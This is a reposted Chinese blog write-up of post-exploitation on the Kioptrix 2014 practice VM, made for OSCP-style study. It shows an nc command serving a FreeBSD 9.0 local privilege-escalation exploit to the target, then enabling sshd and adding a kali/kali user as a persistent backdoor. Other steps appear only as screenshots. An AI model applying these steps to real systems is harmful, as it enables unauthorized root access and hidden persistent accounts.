OSCP-Kioptrix2014-3 后渗透测试

最新推荐文章于 2024-04-10 13:07:42 发布
最新推荐文章于 2024-04-10 13:07:42 发布
阅读量228 收藏
点赞数
原文链接:http://www.cnblogs.com/lanqie/p/11102885.html
版权

拿到root权限

  • 之前的努力,最终获得了两个session
    1226359-20190628151007275-1573109276.png

  • 尝试看看该操作系统的漏洞
    1226359-20190628151335180-1511074722.png

kali:

searchsploit freebsd 9.0

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c ./Desktop/

cd Desktop/

nc -lp 5656 < 28718.c -q 1

msf session:

1226359-20190628152340673-1560660739.png

1226359-20190628153006441-118072754.png

提权成功

echo '' >> freebsd.c 之前编译报错,所以加个空行

  • 尝试修改root密码
    1226359-20190628153323259-720988200.png
    看来高兴早了

修改ssh配置

1226359-20190628154011964-1742562410.png

echo sshd_enable="YES" >> /etc/rc.conf

    
/etc/rc.d/sshd start
/etc/rc.conf: sshd.enable=YES: not found
Starting sshd.

添加用户(kali/kali):

adduser
...

测试连接:
1226359-20190628155020710-829420618.png

尝试一些操作:

$ cd /root/
$ touch test.txt
touch: test.txt: Permission denied

再次提权:

1226359-20190628155913942-1243024937.png

再次ssh以root登录:

1226359-20190628160117500-1591216929.png

转载于:https://www.cnblogs.com/lanqie/p/11102885.html

weixin_30316097
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OSCP-Human-Guide:我自己的OSCP指南
05-12
OSCP-人类指南 编辑我目前正在将所有OSCP内容和其他内容移动到“ ”中。 该存储库将没有更多更新。 带来不便敬请谅解。 该页面是一些技巧的真实记录,真正的指南是 我自己的OSCP指南,包括一些礼物,我自己制作的和...
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
vulnhub-Kioptrix2014靶场
shulao2010的博客
05-26 358
通过靶场看陈旧系统以及防范意识不足导致的公司核心资产如何收到攻击
VulnHub-Kioptrix2014(#5)
热门推荐
江左盟的博客
07-21 1万+
信息收集 是 啊 啊 啊
Vulnhub靶机:Kioptrix_2014,2024年最新美团网络安全开发工程师岗位职能要求
最新发布
2401_84184567的博客
04-10 728
攻击机:kali(192.168.56.101)靶机:Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
64Base_3mrgnc3
底层社会中的弱智
07-12 632
总结: 这个靶机出现了几个奇怪的端口,使用nc或者telnet命令来连接端口查看信息 nc –nv ip port telnet ip port 前期的信息收集,不仅仅是nmap 还可以使用nitko –h、whatweb等等进行收集信息 Html2dic工具可以将页面的关键字转换成字典 Wget url –rq –O xxx.out Html2dic xxx.out | sort –u > xxx.dict 使用公钥登陆的时候要将公钥的权限调制最小 ssh –p 端口
靶场64Base_3mrgnc3的解题过程及个人心路历程
qq_42364315的博客
01-29 632
正值春节,遇到了新型冠状病毒,整个人都不好了,在家里都快憋疯了,于是乎开始做靶场打发时间,顺便死一波脑细胞 ————————————————————废话分割线———————————————————————————— 首先打开靶场看到的一幕 靶场就长这个样子,没有密码 没有办法登录 这个靶场有6个flag 然后打开我的kali 将靶机和kali放到同一个网段 仅主机模式 使用命令查...
FourAndSix2 靶机渗透
banacyo14206的博客
09-24 390
0x01 简介 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02 信息收集 1.通过存活主机发现,确定目标机器IP 2.端...
java红酒网站源码-oscp-notes:oscp-notes
06-05
进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称...
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
OSCP-PWK:https
04-27
Kali 2020.3的提示:安装oh-my-zsh后重新启动机器。 这是最简单的方法。 设置根 sudo dpkg-reconfigure kali-grant-root 字形 转到~/.config/qterminal.org文件夹 将fontFamily更改为Fira Code , Fira-Code或其他...
Kioptrix_Level_1
12-30
Download from https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
OSCP网络安全认证
10-19
OSCP认证,是一个专门针对Kali Linux渗透测试培训课程的专业认证。该认证机构声称,OSCP认证是一个区别于所有其它认证的考试,考试全程采取手动操作的方式,而不设笔试环节。
Vulnhub靶机:Kioptrix_2014
qq_48904485的博客
03-19 535
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix: 2014(192.168.56.108)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/
靶机3. FourAndSix2
wj33333的博客
10-05 68
该靶机没有web端,不需要网页老规矩。
网络安全攻防界的OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS
HUANGXIN9898的博客
09-11 1633
关注网络安全攻防领域的筒子们,肯定对OSCP、CISP-PTE、CISP-PTS、CISP-IRE、CISP-IRS不陌生,但是关于他们直减的区别,今儿想做个分享。
FourAndSix: 2.01靶机入侵
渗透测试研究中心
02-12 174
0x01前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: https://download.vulnhub.com/fourandsix/FourAndSix2.ova 0x02信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1....
红队打靶:FourAndSix2.01打靶思路详解(vulnhub)
Bossfrank的博客
07-31 780
本文是vulnhub靶机FourAndSix2.01的详细打靶过程。涉及到的识点包括nfs文件挂载、join破解.7z加密文件、私钥哈希、7z2john/ssh2john工具的使用、less+vim组合利用提权等。靶机的操作系统是OpenBSD,非常规的Linux靶机,值得打靶实操。
靶机【Vulnhub】FourAndSix2
干铮的博客
10-19 568
FourAndSix2 1.主机发现 靶机给出了网卡ip和网关 还是Nmap ping扫一下 C:\Users\ASUS>Nmap -sP 192.168.43.0/24 Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-19 10:48 ?D1ú±ê×?ê±?? Nmap scan report for 192.168.43.1 Host is up (0.0070s latency). MAC Address: EC:D0:9F
OSCP Like Vulns Machines.pdf
10-06
"《OSCP Like Vulns Machines》是一份专注于网络安全渗透测试的资料,由Joas Antonio整理并分享。这份文档汇集了各类VulnHub平台上的实战型虚拟机(VM)环境,这些虚拟机被精心设计,旨在供网络安全专业人员进行专业...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值